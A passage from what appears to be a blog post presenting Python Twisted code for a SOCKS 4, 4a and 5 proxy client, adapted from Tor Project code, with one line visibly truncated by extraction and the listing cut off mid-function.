<code>twistd -n socks</code> and the SOCKS5 protocol with the <a href="http://www.inet.no/dante/" title="dante">dante socks proxy
server</a> on my VPS. So I guess the
basic functionality should be working by now. GSSAPI (Kerberos)
<a href="https://tools.ietf.org/html/rfc1961">support</a> is planned.</p>
<p>Here is the socksclient code, which is also available on my github
repository:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Copyright (c) 2011-2013, The Tor Project</span>
<span class="c1"># See LICENSE for the license.</span>
<span class="c1"># Updated on 25.01.14-28.01.14 to add SOCKS 5 support.</span>
<span class="c1"># Cleaned some parts of the code and abstracted quite a bit to handle the most important SOCKS5</span>
<span class="c1"># functionality like</span>
<span class="c1"># - username/password authentication</span>
<span class="c1"># - gssapi authentication (planned)</span>
<span class="c1"># - CONNECT command (the normal case, there are others: UDP ASSOCIATE and BIND, but they aren't as important. Maybe I will add them</span>
<span class="c1"># in the future. If anyone wants to implement them, the basic structure is already here and the SOCKSv5ClientProtocol should be</span>
<span class="c1"># rather easy extensible (how the actual connection, listening for incoming connections (BIND) and opening a UDP connection (UDP ASSOCIATE)</span>
<span class="c1"># is done in the twisted world, is another question.</span>
<span class="c1"># Added:</span>
<span class="c1"># - SOCKSv4ClientFactory was renamed to SOCKSClientFactory and abstracted to handle all SOCKS 4/4a SOCKS5 (It is still ONE protocol, so one Factory should be logical correct)</span>
<span class="c1"># - added SOCKS5ClientFactory</span>
<span class="c1"># - SOCKSClientProtocol is the base class for all three protocols</span>
<span class="c1"># - SOCKSv4aClientProtocol inherits from SOCKSv4ClientProtocol. I made the deliberate choice to differ between SOCKS 4 and 4a, altough 4a has the exactly same functionality as 4,</span>
<span class="c1"># it might be the case that servers only speak version 4.</span>
<span class="c1"># References:</span>
<span class="c1"># A actively maintained, most recent version of PySocks from https://github.com/Anorov/PySocks</span>
<span class="c1"># The original version of socksclient.py:</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Contact: incolumitas.com</span>
<span class="kn">import</span> <span class="nn">inspect</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">from</span> <span class="nn">zope.interface</span> <span class="kn">import</span> <span class="n">implements</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="kn">from</span> <span class="nn">twisted.internet.interfaces</span> <span class="kn">import</span> <span class="n">IStreamClientEndpoint</span><span class="p">,</span> <span class="n">IReactorTime</span>
<span class="kn">from</span> <span class="nn">twisted.internet.protocol</span> <span class="kn">import</span> <span class="n">Protocol</span><span class="p">,</span> <span class="n">ClientFactory</span>
<span class="kn">from</span> <span class="nn">twisted.internet.endpoints</span> <span class="kn">import</span> <span class="n">_WrappingFactory</span>
<span class="k">class</span> <span class="nc">SOCKSError</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">val</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">val</span> <span class="o">=</span> <span class="n">val</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="nb">repr</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">val</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">SOCKSClientProtocol</span><span class="p">(</span><span class="n">Protocol</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Base class for SOCKS protocols 4, 4a and 5</span>
<span class="sd"> '''</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">def</span> <span class="nf">noteTime</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">event</span><span class="p">):</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span><span class="p">[</span><span class="n">event</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="o">.</span><span class="n">seconds</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">abort</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">errmsg</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">loseConnection</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">handshakeDone</span><span class="o">.</span><span class="n">errback</span><span class="p">(</span><span class="n">SOCKSError</span><span class="p">(</span><span class="s1">'SOCKS </span><span class="si">%s</span><span class="s1">: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">],</span> <span class="n">errmsg</span><span class="p">)))</span>
<span class="k">def</span> <span class="nf">isHostname</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">string</span><span class="p">):</span>
<span class="n">dns_label_regex</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^(?![0-9]+$)(?!-)[a-zA-Z0-9-]{,63}(?H", port)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'RELAY_REQUEST_SENT'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">=</span> <span class="s1">'connection_requested'</span>
<span class="k">def</span> <span class="nf">verifySocksReply</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="n">where</span> <span class="o">=</span> <span class="s1">'SOCKS5 verifySocksReply'</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o"><</span> <span class="mi">10</span><span class="p">:</span> <span class="c1"># all hostname are longer than a IPv4 address</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Too few data from server </span><span class="si">%s</span><span class="s1">.'</span> <span class="o">%</span> <span class="n">where</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">version</span><span class="p">,</span> <span class="n">reply</span><span class="p">,</span> <span class="n">rsv</span><span class="p">,</span> <span class="n">address_type</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'!BBBB'</span><span class="p">,</span> <span class="n">data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span>
<span class="k">if</span> <span class="n">version</span> <span class="o">!=</span> <span class="mh">0x5</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Invalid version'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">reply</span> <span class="o">!=</span> <span class="mh">0x0</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Server reply indicates failure. Reason: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">SOCKS5_ERRORS</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">reply</span><span class="p">,</span> <span class="s2">"Unknown error"</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">address_type</span> <span class="o">==</span> <span class="mh">0x1</span><span class="p">:</span> <span class="c1"># handle IPv4 address</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bound_address</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">bound_port</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">]),</span>
<span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'>H'</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">10</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">elif</span> <span class="n">address_type</span> <span class="o">==</span> <span class="mh">0x3</span><span class="p">:</span> <span class="c1"># handle domain name</span>
<span class="n">dns_name_len</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">5</span><span class="p">])</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bound_address</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">bound_port</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">5</span><span class="p">:</span><span class="n">dns_name_len</span><span class="p">],</span>
<span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'>H'</span><span class="p">,</span> <span class="n">data</span><span class="p">[(</span><span class="mi">5</span><span class="o">+</span><span class="n">dns_name_len</span><span class="p">):(</span><span class="mi">5</span><span class="o">+</span><span class="n">dns_name_len</span><span class="o">+</span><span class="mi">2</span><span class="p">)])[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">elif</span> <span class="n">address_type</span> <span class="o">==</span> <span class="mh">0x4</span><span class="p">:</span> <span class="c1"># handle Ipv6 address</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bound_address</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">bound_port</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">inet_ntop</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET6</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">20</span><span class="p">]),</span>
<span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'>H'</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="mi">20</span><span class="p">:</span><span class="mi">22</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">=</span> <span class="s1">'connection_verified'</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">def</span> <span class="nf">connectionMade</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'CONNECTED'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'NEGOTIATE_AUTH_METHOD'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">negotiateAuthenticationMethod</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">dataReceived</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">buf</span> <span class="o">+=</span> <span class="n">data</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'do_auth'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">authenticate</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'check_auth'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">checkAuth</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'authenticated'</span><span class="p">:</span>
<span class="n">host</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_host</span>
<span class="n">port</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_port</span>
<span class="bp">self</span><span class="o">.</span><span class="n">sendRelayRequest</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'connection_requested'</span><span class="p">:</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">verifySocksReply</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">setupRelay</span><span class="p">()</span>
<span class="k">class</span> <span class="nc">SOCKSv4ClientProtocol</span><span class="p">(</span><span class="n">SOCKSClientProtocol</span><span class="p">):</span>
<span class="n">SOCKS4_ERRORS</span> <span class="o">=</span> <span class="p">{</span>
<span class="mh">0x5B</span><span class="p">:</span> <span class="s2">"Request rejected or failed"</span><span class="p">,</span>
<span class="mh">0x5C</span><span class="p">:</span> <span class="s2">"Request rejected because SOCKS server cannot connect to identd on the client"</span><span class="p">,</span>
<span class="mh">0x5D</span><span class="p">:</span> <span class="s2">"Request rejected because the client program and identd report different user-ids"</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">sendRelayRequest</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version_specific'</span><span class="p">][</span><span class="s1">'username'</span><span class="p">]</span>
<span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">username</span> <span class="o">=</span> <span class="mh">0x4</span><span class="p">,</span> <span class="mh">0x1</span><span class="p">,</span> <span class="p">[</span><span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span><span class="p">,</span> <span class="n">username</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span><span class="o">+</span><span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span><span class="p">][</span><span class="ow">not</span> <span class="ow">not</span> <span class="n">username</span><span class="p">]</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
<span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Not a valid IPv4 address.'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">msg</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'!BBH'</span><span class="p">,</span> <span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">username</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'REQUEST'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">verifySocksReply</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Return True on success and False on need-more-data or error.</span>
<span class="sd"> In the case of an error, the connection is closed and the</span>
<span class="sd"> handshakeDone errback is invoked with a SOCKSError exception</span>
<span class="sd"> before False is returned.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o"><</span> <span class="mi">8</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">!=</span> <span class="mh">0x0</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Expected 0 bytes'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">status</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="k">if</span> <span class="n">status</span> <span class="o">!=</span> <span class="mh">0x5a</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Relay request failed. Reason=</span><span class="si">%s</span><span class="s1">.'</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">SOCKS4_ERRORS</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s1">'Unknown error'</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">def</span> <span class="nf">connectionMade</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'CONNECT'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'NEGOTIATE'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">sendRelayRequest</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_host</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_port</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">dataReceived</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">buf</span> <span class="o">+=</span> <span class="n">data</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">verifySocksReply</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">setupRelay</span><span class="p">()</span>
<span class="k">class</span> <span class="nc">SOCKSv4aClientProtocol</span><span class="p">(</span><span class="n">SOCKSv4ClientProtocol</span><span class="p">):</span>
<span class="sd">'''Only extends SOCKS 4 to remotely resolve hostnames.'''</span>
<span class="k">def</span> <span class="nf">sendRelayRequest</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version_specific'</span><span class="p">][</span><span class="s1">'username'</span><span class="p">]</span>
<span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">username</span> <span class="o">=</span> <span class="mh">0x4</span><span class="p">,</span> <span class="mh">0x1</span><span class="p">,</span> <span class="p">[</span><span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span><span class="p">,</span> <span class="n">username</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span><span class="o">+</span><span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span><span class="p">][</span><span class="ow">not</span> <span class="ow">not</span> <span class="n">username</span><span class="p">]</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
<span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
<span class="n">addr</span> <span class="o">=</span> <span class="s1">'</span><span class="se">\x00\x00\x00\x01</span><span class="s1">'</span>
<span class="n">dnsname</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="se">\x00</span><span class="s1">'</span> <span class="o">%</span> <span class="n">host</span>
<span class="n">msg</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'!BBH'</span><span class="p">,</span> <span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="n">dnsname</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">msg</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'!BBH'</span><span class="p">,</span> <span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">username</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'REQUEST'</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">SOCKSClientFactory</span><span class="p">(</span><span class="n">ClientFactory</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span> <span class="o">=</span> <span class="n">proxy_config</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'4'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol</span> <span class="o">=</span> <span class="n">SOCKSv4ClientProtocol</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'4a'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol</span> <span class="o">=</span> <span class="n">SOCKSv4aClientProtocol</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'5'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol</span> <span class="o">=</span> <span class="n">SOCKSv5ClientProtocol</span>
<span class="k">def</span> <span class="nf">buildProtocol</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">ClientFactory</span><span class="o">.</span><span class="n">buildProtocol</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">)</span>
<span class="n">r</span><span class="o">.</span><span class="n">proxy_config</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span>
<span class="n">r</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span>
<span class="n">r</span><span class="o">.</span><span class="n">postHandshakeFactory</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeFactory</span>
<span class="n">r</span><span class="o">.</span><span class="n">handshakeDone</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">handshakeDone</span>
<span class="n">r</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span>
<span class="n">r</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span>
<span class="k">return</span> <span class="n">r</span>
<span class="k">class</span> <span class="nc">SOCKSWrapper</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Generic class to wrap all 3 SOCKS protocol versions 4, 4a, 5 around a TCP connection</span>
<span class="sd"> '''</span>
<span class="n">implements</span><span class="p">(</span><span class="n">IStreamClientEndpoint</span><span class="p">)</span>
<span class="n">factory</span> <span class="o">=</span> <span class="n">SOCKSClientFactory</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">reactor</span><span class="p">,</span> <span class="n">endpoint</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">,</span> <span class="n">timestamps</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_host</span> <span class="o">=</span> <span class="n">proxy_config</span><span class="p">[</span><span class="s1">'host'</span><span class="p">]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_port</span> <span class="o">=</span> <span class="n">proxy_config</span><span class="p">[</span><span class="s1">'port'</span><span class="p">]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_proxy_config</span> <span class="o">=</span> <span class="n">proxy_config</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_reactor</span> <span class="o">=</span> <span class="n">reactor</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_endpoint</span> <span class="o">=</span> <span class="n">endpoint</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="kc">None</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">timestamps</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="n">timestamps</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="n">IReactorTime</span><span class="p">(</span><span class="n">reactor</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">noteTime</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">event</span><span class="p">):</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span><span class="p">[</span><span class="n">event</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="o">.</span><span class="n">seconds</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">protocolFactory</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Return a deferred firing when the SOCKS connection is established.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="nf">createWrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Wrap creation of _WrappingFactory since __init__() doesn't</span>
<span class="sd"> take a canceller as of Twisted 12.1 or something.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">inspect</span><span class="o">.</span><span class="n">getargspec</span><span class="p">(</span><span class="n">_WrappingFactory</span><span class="o">.</span><span class="fm">__init__</span><span class="p">)[</span><span class="mi">0</span><span class="p">])</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">_canceller</span><span class="p">(</span><span class="n">deferred</span><span class="p">):</span>
<span class="n">connector</span><span class="o">.</span><span class="n">stopConnecting</span><span class="p">()</span>
<span class="n">deferred</span><span class="o">.</span><span class="n">errback</span><span class="p">(</span>
<span class="n">error</span><span class="o">.</span><span class="n">ConnectingCancelledError</span><span class="p">(</span>
<span class="n">connector</span><span class="o">.</span><span class="n">getDestination</span><span class="p">()))</span>
<span class="k">return</span> <span class="n">_WrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">_canceller</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span> <span class="c1"># Twisted >= 12.1.</span>
<span class="k">return</span> <span class="n">_WrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'START'</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="c1"># Connect with an intermediate SOCKS factory/protocol,</span>
<span class="c1"># which then hands control to the provided protocolFactory</span>
<span class="c1"># once a SOCKS connection has been established.</span>
<span class="n">f</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">factory</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_proxy_config</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_endpoint</span>
<span class="n">f</span><span class="o">.</span><span class="n">postHandshakeFactory</span> <span class="o">=</span> <span class="n">protocolFactory</span>
<span class="n">f</span><span class="o">.</span><span class="n">handshakeDone</span> <span class="o">=</span> <span class="n">defer</span><span class="o">.</span><span class="n">Deferred</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span>
